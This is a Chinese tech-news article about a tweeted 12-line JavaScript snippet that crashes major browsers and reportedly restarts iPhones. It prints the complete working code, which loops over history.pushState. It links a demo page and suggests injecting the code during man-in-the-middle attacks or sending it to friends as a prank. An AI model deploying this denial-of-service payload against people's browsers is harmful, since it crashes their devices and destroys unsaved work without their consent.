首页 > 业界动态 > 正文

这十二行代码是如何让浏览器爆炸的?
2016-02-20 19:45:06   来源: 0xroot FreeBuf    评论:0 点击:

今天刷推特的时候发现Cyber Security@cyber__sec的推文让人眼前一亮:使用这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iphone重启……

这十二行代码是如何让浏览器爆炸的?

起因

今天刷推特的时候发现Cyber Security@cyber__sec的推文让人眼前一亮:

Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit//使用下面这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iphone重启。

继续在推特上深挖发现IT Security Tweets ™ @F1r3h4nd 于17日发推:

Crash your friend's browser and restart Iphone with a link which has this script: #0day

//把带有下面这个脚本的链接发给你的朋友,能让你朋友的浏览器崩溃,而且让Iphone重启。

\

完整HTML代码如下:

  1. <html> 
  2. <body> 
  3. <script> 
  4. var total="";  
  5. for (var i=0;i<1000000;i++)  
  6. {  
  7.     totaltotal= total+i.toString();  
  8.     history.pushState(0,0,total);  
  9. }  
  10. </script> 
  11. </body> 
  12. </html> 

demo:(温馨提示:请保存浏览器其它窗口的编辑任务)

www.0xroot.cn/demo.html (点击一下,又不会怀孕!)

接来下会发生什么?

点开以后,我的状态是这样的:

\ 

如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死!

如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让iPhone重启,这一现象倒是没有出现。22:49 修正:iPhone用Safari打开之后链接之后,手机注销重启了!…

思考

这是Bug还是0day?为什么会有这一现象?如何实现的?

有哪些比较有意思的利用姿势?(我先来个:当在执行MITM中间人攻击的时候,可以注入这一段js,来个恶搞整蛊。然后都懂的…)

欢迎大家在评论中发表自己的观点:)

微博评论/讨论摘取

怀孕了...好有趣...好可怕...整蛊不错我已祸害了好多人(卖萌脸(づ ̄ 3 ̄)づ)崩溃了火狐假死10秒后弹窗提示脚本无响应可停止难道是history的栈溢出么?可以可以,新姿势get√JS是世界上最好的语言!hist.pushState是干嘛用的?电脑正在重启不能只让我一个人中招我为什么会手贱?Chrome隐身模式没有问题啊
【责任编辑:蓝雨泪 TEL:(010)68476606】

相关热词搜索:浏览器崩溃 Iphone重启 终端安全

上一篇:Websense、Stonesoft与Raytheon商务公司组成Forcepoint
下一篇:网络安全行业进入”战国时代”,谁能突围?

分享到: 收藏